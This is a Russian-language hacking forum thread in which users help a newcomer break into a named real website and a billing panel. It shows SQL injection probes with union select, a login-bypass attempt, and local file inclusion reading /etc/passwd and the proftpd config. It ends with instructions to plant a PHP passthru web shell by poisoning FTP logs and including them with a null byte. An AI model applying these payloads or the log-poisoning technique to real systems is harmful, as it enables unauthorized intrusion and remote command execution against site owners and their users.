Вот есть такая панель с демо входом, находится на хостинге, при подстановки в адресную строку:
http://****host.net/billing/faq.php?category=1&identry=1&mod=comment&start=1'

появляется эта надпись:
Так, а вот ломать скрипт нельзя!
Тренируйся лучше на... кошках :)
пробывал на XSS не чего не изменяется
на данном сайте нет не форума не гостивой....
что небуть подскажите куда двигаться в плане взлома.

Nmap -- проверь сервиса!
Чекни на domainsdb.net --может есть еще сайты на сервере.
Кста там не Abills billing system <= 0.24.f2, если да , то топай на -- http://nst.void.ru/?q=papers&cat_where=advisories&show=23

Нет там стоит BPanel v2.8 Beta2 SE, на остальных сайтах пока я просмотрел 15 везде статические страници, не одной динамической , (не формов не чего)

http://biznesprom.ru/index.php?categoryID=-6761'
появляется эта ошибка:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

при вводе:http://biznesprom.ru/index.php?categoryID=-6761+union+select+1/*
всё нормально

а при вводе: http://biznesprom.ru/index.php?categoryID=-6761+union+select+1,2/*

http://biznesprom.ru/index.php?categoryID=-6761+union+select+1,2/*

http://biznesprom.ru/index.php?categoryID=-6761+union+select+31337/*

скл иньекция есть. но к сожалению не выводит ничего.

А вот в логине есть скуль, позволяющая обойти авторизацию

Это как нибуть связанно с этим кодом: <form action="index.php" method=post>

<tr>
<td>
<table border=0>
<input type="hidden" name="enter" value="1">
<tr>
<td align=right><font class=light>Логин:</font></td>
<td><input type="text" class=ss name="user_login" size=10></td>
</tr>
<tr>
<td align=right><font class=light>Пароль:</font></td>
<td><input name="user_pw" class=ss type="password" size=10></td>
</tr> в смысле мне надо в командную строку в браузере вводить запрос или можно в само форму авторизации , сейчас попробывал вставлять : ""or "1"="1" не чего не получилось , ну чтож буду сейчас учить матчасть ( читать статьи)

локальный инклуд:
http://biznesprom.ru/index.php?aux_page=../../../../../../../../../../../../../etc/passwd

что делать дальше, думаю, знаете сами.

Пробывал подставлять и :
http://biznesprom.ru/index.php?aux_page=../orderform/letter/contacts.php

и остальные варианты с раширением php показывет что
""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
Извините, запрашиваемый документ не был найден на сервере
""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""

но при этом при вставке:
http://biznesprom.ru/index.php?aux_page=../images/design/n_02.jpg
показует составляющую рисунка (исходник не знаю какправильно назвать)
удалённо тоже не чего не инклудится , тоесть локальный инклуд ?
пробыва добовлять в конец %00 тоже без результатно ,
брут не подходит так как сижу на диалупе.

Ядовитый 0 работает.. то есть, что можем из этого извлечь. МЫ находим любые логи (возбмем к примеру логи фтп-шника или сервера (для поисков логов фтпшника нам в помощь приходи http://biznesprom.ru/index.php?aux_page=../../../../../../../../../../../../../etc/proftpd.conf ) .. затем.. если фтп - то .. пытаемся залогиниться на сервер с логином.. ну например <? @passthru($cmd); ?> ... что естественно отображается в логах (неправтльный лог.. значит в еррор-логе) . Инклудим лог, ставим %00 , и у нас есть полноценный шелл.

blackybr, там и без %00 все работает, т.к. расширения нет.